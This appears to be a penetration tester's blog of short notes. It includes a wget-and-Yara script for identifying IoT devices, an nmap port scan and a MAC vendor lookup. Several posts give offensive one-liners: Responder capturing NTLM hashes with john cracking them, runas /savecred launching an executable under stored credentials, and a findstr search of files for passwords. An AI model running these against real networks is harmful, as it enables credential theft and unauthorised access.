Monday, November 25, 2019

kali update apt-get upgrade

apt-get update (refreshes the package lists from the configured sources)
apt-get upgrade (upgrades the installed tools/packages)
apt-get dist-upgrade (upgrades the entire Kali rolling distribution)
apt-get autoremove (removes dependencies that are no longer needed)

Wednesday, November 6, 2019

Python IoT search with Wget and Yara Rules

# Given a list of URLs, determine what type of IoT device (or any device, for that matter) each one is, based on the Yara rules you put into the .yar files

import os
import subprocess
import traceback

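# --- Configuration ---------------------------------------------------------
# Flags are the strings "true"/"false", as in the original script.
debug = "false"
skipDownload = "false"
# NOTE: `input` shadows the builtin of the same name; the name is kept so
# existing copies of this configuration keep working.
input = "urls.txt"
yaraSpecificRuleFile = "IoTSpecific.yar"
yaraGenericRuleFile = "IoTGeneric.yar"
# --no-check-certificate means the server's TLS certificate is not verified,
# so every downloaded page must be treated as untrusted content.
wgetParams = "--quiet --no-check-certificate --timeout=2 --tries=3"
yaraParams = ""
outputExt = ".html"


def _log_debug(message):
    """Print a DEBUG line when the debug flag is switched on."""
    if debug == "true":
        print("DEBUG,%s" % message)


def _run(argv, stderr=None):
    """Run *argv* without a shell and return its stdout as text.

    The URL list and the file names in the working directory are untrusted
    input. Passing an argument list (no shell=True) keeps characters such as
    ';', '|', '$' or backticks in them from being interpreted as shell syntax.
    universal_newlines=True makes check_output return str rather than bytes,
    so the "error" substring test and str.replace() below work on Python 3.
    """
    return subprocess.check_output(argv, stderr=stderr, universal_newlines=True)


def _yara(ruleFile, htmlfile, verb):
    """Scan *htmlfile* with *ruleFile* and return yara's raw text output.

    Returns an empty string when yara printed nothing, or None when the run
    itself failed (the ERROR line has already been printed in that case).
    *verb* is "Scan" or "ReScan" and only selects the wording of the message.
    """
    # NOTE(review): a file name that starts with '-' would be read by yara as
    # an option rather than a path; the name is passed unchanged here so the
    # printed output format stays the same.
    argv = ["yara"] + yaraParams.split() + [ruleFile, htmlfile]
    try:
        output = _run(argv)
    except (subprocess.CalledProcessError, OSError) as exc:
        print("ERROR,Unable to %s '%s' error '%s'" % (verb, " ".join(argv), exc))
        return None
    if "error" in output:
        print("ERROR,Unable to %s '%s' error '%s'" % (verb, " ".join(argv), output))
    return output


# --- Step 1: download every URL to a local .html file ----------------------
if skipDownload == "false":
    # The URL file is opened only when a download is requested and is closed
    # even if the loop raises; wget's stderr is discarded as before.
    with open(input, "r") as urls, open(os.devnull, "w") as devnull:
        for url in urls:
            url = url.strip()
            if not url:
                continue  # blank line in the URL list
            # Build a flat file name: path separators, dots and query
            # characters become '_' so the result stays in the working
            # directory.
            cleanurl = url
            for ch in '/\\:.&?=%':
                cleanurl = cleanurl.replace(ch, '_')
            cleanurl += outputExt
            # "--" ends option parsing, so a line starting with '-' is taken
            # as a URL and not as a wget option.
            wgetArgv = (["wget"] + wgetParams.split()
                        + ["--output-document=" + cleanurl, "--", url])
            _log_debug("Starting Download of '%s' to '%s'" % (url, cleanurl))
            try:
                output = _run(wgetArgv, stderr=devnull)
                if "error" in output:
                    print("ERROR,Unable to download '%s' error '%s'"
                          % (" ".join(wgetArgv), output))
            except (subprocess.CalledProcessError, OSError) as exc:
                # A non-zero wget exit status (failed download) lands here.
                print("ERROR,Unable to download '%s' error '%s'"
                      % (" ".join(wgetArgv), exc))
            _log_debug("Finished Download of '%s' to '%s'" % (url, cleanurl))

# --- Step 2: classify every .html file in the working directory ------------
for htmlfile in os.listdir('.'):
    if not htmlfile.endswith(".html"):
        continue
    if os.stat(htmlfile).st_size == 0:
        # Empty file: nothing was written for this URL.
        print("NoResponse,%s" % htmlfile)
        continue
    _log_debug("Starting Scanning: '%s'" % htmlfile)
    result = _yara(yaraSpecificRuleFile, htmlfile, "Scan")
    if result:
        print(result.rstrip().replace(" ", ","))
    elif result is not None:
        # No output from the specific rules: fall back to the generic rules.
        _log_debug("Starting ReScanning: '%s'" % htmlfile)
        result = _yara(yaraGenericRuleFile, htmlfile, "ReScan")
        if result:
            print(result.rstrip().replace(" ", ","))
        elif result is not None:
            print("NoMatch,%s" % htmlfile)
        _log_debug("Finished ReScanning: '%s'" % htmlfile)
    _log_debug("Finished Scanning: '%s'" % htmlfile)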

Thursday, October 31, 2019

Nmap Open Web Ports to CSV

nmap scan web ports (80,443,8080,8443) and output to csv using sed

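# Scan the four web ports, read nmap's grepable output from stdout (-oG -),
# drop the comment and "Status: Up" lines, rewrite each host line as
# ip,hostname,80,443,8080,8443 and keep only the lines that contain "open".
# grep -E replaces the deprecated egrep; [^[:space:]] replaces [^\s], because
# inside a bracket expression \s is not the whitespace class.
nmap -T4 --max-rtt-timeout 200ms --initial-rtt-timeout 150ms --min-hostgroup 512 -Pn -p 80,443,8080,8443 10.99.106.0/24 -oG - | grep -E -v "^#|Status: Up" | sed -E 's/Host\:\s([^[:space:]]+)\s[(]([^)]*)[)]\s+Ports[:]\s80\/([^/]+)\/.+443\/([^/]+)\/.+8080\/([^/]+)\/.+8443\/([^/]+)\/.*/\1,\2,\3,\4,\5,\6/' | grep open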



example:

10.99.106.10,test1.local.com,open,closed,closed,closed
10.99.106.11,,open,open,closed,closed
10.99.106.12,,open,open,closed,closed
10.99.106.76,test2.local.com,closed,open,closed,closed

Tuesday, October 22, 2019

Sample Responder command

responder -I eth0 -r -b

cd /usr/share/responder/logs

john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt

john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt

Friday, October 18, 2019

Print all Mac Address Vendors around you (Arp -a)

# print all mac address vendors around you (using arp table and this great python library https://pypi.org/project/mac-vendor-lookup/ )

import os
from mac_vendor_lookup import MacLookup

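# Read the local ARP table and print it unchanged first.
myCmd = os.popen("arp -a").read()
print(myCmd)

# One lookup object for the whole run instead of a new one per token.
macLookup = MacLookup()

for line in myCmd.splitlines():
    for item in line.split():
        # Tokens containing '-' are treated as MAC address candidates; tokens
        # containing '--' are skipped (presumably the '---' separator in the
        # interface header line -- confirm against your arp output).
        if "-" in item and "--" not in item:
            try:
                print(item + ": " + macLookup.lookup(item))
            except Exception:
                # Unknown vendor or a token that is not a MAC address. A bare
                # `except:` would also swallow KeyboardInterrupt/SystemExit.
                print(item + ": not found")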

View Stored Credentials and Runas

>cmdkey /list

Currently stored credentials:

....

runas /savecred /user:XXXX "c:\BAD.exe"

Search inside Windows Files for passwords

>findstr /s password c:\*.ps1